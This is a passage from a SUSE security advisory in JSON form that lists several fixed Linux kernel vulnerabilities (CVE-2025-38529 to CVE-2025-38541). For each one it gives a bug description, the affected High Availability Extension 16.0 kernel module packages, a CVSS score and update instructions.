"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38529"
},
{
"cve": "CVE-2025-38530",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38530"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: pcl812: Fix bit shift out of bounds\n\nWhen checking for a supported IRQ number, the following test is used:\n\n\tif ((1 \u003c\u003c it-\u003eoptions[1]) \u0026 board-\u003eirq_bits) {\n\nHowever, `it-\u003eoptions[i]` is an unchecked `int` value from userspace, so\nthe shift amount could be negative or out of bounds. Fix the test by\nrequiring `it-\u003eoptions[1]` to be within bounds before proceeding with\nthe original test. Valid `it-\u003eoptions[1]` values that select the IRQ\nwill be in the range [1,15]. The value 0 explicitly disables the use of\ninterrupts.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38530",
"url": "https://www.suse.com/security/cve/CVE-2025-38530"
},
{
"category": "external",
"summary": "SUSE Bug 1248206 for CVE-2025-38530",
"url": "https://bugzilla.suse.com/1248206"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38530"
},
{
"cve": "CVE-2025-38535",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38535"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nphy: tegra: xusb: Fix unbalanced regulator disable in UTMI PHY mode\n\nWhen transitioning from USB_ROLE_DEVICE to USB_ROLE_NONE, the code\nassumed that the regulator should be disabled. However, if the regulator\nis marked as always-on, regulator_is_enabled() continues to return true,\nleading to an incorrect attempt to disable a regulator which is not\nenabled.\n\nThis can result in warnings such as:\n\n[ 250.155624] WARNING: CPU: 1 PID: 7326 at drivers/regulator/core.c:3004\n_regulator_disable+0xe4/0x1a0\n[ 250.155652] unbalanced disables for VIN_SYS_5V0\n\nTo fix this, we move the regulator control logic into\ntegra186_xusb_padctl_id_override() function since it\u0027s directly related\nto the ID override state. The regulator is now only disabled when the role\ntransitions from USB_ROLE_HOST to USB_ROLE_NONE, by checking the VBUS_ID\nregister. This ensures that regulator enable/disable operations are\nproperly balanced and only occur when actually transitioning to/from host\nmode.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38535",
"url": "https://www.suse.com/security/cve/CVE-2025-38535"
},
{
"category": "external",
"summary": "SUSE Bug 1248240 for CVE-2025-38535",
"url": "https://bugzilla.suse.com/1248240"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38535"
},
{
"cve": "CVE-2025-38537",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38537"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: phy: Don\u0027t register LEDs for genphy\n\nIf a PHY has no driver, the genphy driver is probed/removed directly in\nphy_attach/detach. If the PHY\u0027s ofnode has an \"leds\" subnode, then the\nLEDs will be (un)registered when probing/removing the genphy driver.\nThis could occur if the leds are for a non-generic driver that isn\u0027t\nloaded for whatever reason. Synchronously removing the PHY device in\nphy_detach leads to the following deadlock:\n\nrtnl_lock()\nndo_close()\n ...\n phy_detach()\n phy_remove()\n phy_leds_unregister()\n led_classdev_unregister()\n led_trigger_set()\n netdev_trigger_deactivate()\n unregister_netdevice_notifier()\n rtnl_lock()\n\nThere is a corresponding deadlock on the open/register side of things\n(and that one is reported by lockdep), but it requires a race while this\none is deterministic.\n\nGeneric PHYs do not support LEDs anyway, so don\u0027t bother registering\nthem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38537",
"url": "https://www.suse.com/security/cve/CVE-2025-38537"
},
{
"category": "external",
"summary": "SUSE Bug 1248229 for CVE-2025-38537",
"url": "https://bugzilla.suse.com/1248229"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38537"
},
{
"cve": "CVE-2025-38538",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38538"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: nbpfaxi: Fix memory corruption in probe()\n\nThe nbpf-\u003echan[] array is allocated earlier in the nbpf_probe() function\nand it has \"num_channels\" elements. These three loops iterate one\nelement farther than they should and corrupt memory.\n\nThe changes to the second loop are more involved. In this case, we\u0027re\ncopying data from the irqbuf[] array into the nbpf-\u003echan[] array. If\nthe data in irqbuf[i] is the error IRQ then we skip it, so the iterators\nare not in sync. I added a check to ensure that we don\u0027t go beyond the\nend of the irqbuf[] array. I\u0027m pretty sure this can\u0027t happen, but it\nseemed harmless to add a check.\n\nOn the other hand, after the loop has ended there is a check to ensure\nthat the \"chan\" iterator is where we expect it to be. In the original\ncode we went one element beyond the end of the array so the iterator\nwasn\u0027t in the correct place and it would always return -EINVAL. However,\nnow it will always be in the correct place. I deleted the check since\nwe know the result.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38538",
"url": "https://www.suse.com/security/cve/CVE-2025-38538"
},
{
"category": "external",
"summary": "SUSE Bug 1248213 for CVE-2025-38538",
"url": "https://bugzilla.suse.com/1248213"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38538"
},
{
"cve": "CVE-2025-38539",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38539"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Add down_write(trace_event_sem) when adding trace event\n\nWhen a module is loaded, it adds trace events defined by the module. It\nmay also need to modify the modules trace printk formats to replace enum\nnames with their values.\n\nIf two modules are loaded at the same time, the adding of the event to the\nftrace_events list can corrupt the walking of the list in the code that is\nmodifying the printk format strings and crash the kernel.\n\nThe addition of the event should take the trace_event_sem for write while\nit adds the new event.\n\nAlso add a lockdep_assert_held() on that semaphore in\n__trace_add_event_dirs() as it iterates the list.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38539",
"url": "https://www.suse.com/security/cve/CVE-2025-38539"
},
{
"category": "external",
"summary": "SUSE Bug 1248211 for CVE-2025-38539",
"url": "https://bugzilla.suse.com/1248211"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38539"
},
{
"cve": "CVE-2025-38540",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38540"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: quirks: Add quirk for 2 Chicony Electronics HP 5MP Cameras\n\nThe Chicony Electronics HP 5MP Cameras (USB ID 04F2:B824 \u0026 04F2:B82C)\nreport a HID sensor interface that is not actually implemented.\nAttempting to access this non-functional sensor via iio_info causes\nsystem hangs as runtime PM tries to wake up an unresponsive sensor.\n\nAdd these 2 devices to the HID ignore list since the sensor interface is\nnon-functional by design and should not be exposed to userspace.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38540",
"url": "https://www.suse.com/security/cve/CVE-2025-38540"
},
{
"category": "external",
"summary": "SUSE Bug 1248208 for CVE-2025-38540",
"url": "https://bugzilla.suse.com/1248208"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38540"
},
{
"cve": "CVE-2025-38541",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38541"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mt76: mt7925: Fix null-ptr-deref in mt7925_thermal_init()\n\ndevm_kasprintf() returns NULL on error. Currently, mt7925_thermal_init()\ndoes not check for this case, which results in a NULL pointer\ndereference.\n\nAdd NULL check after devm_kasprintf() to prevent this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
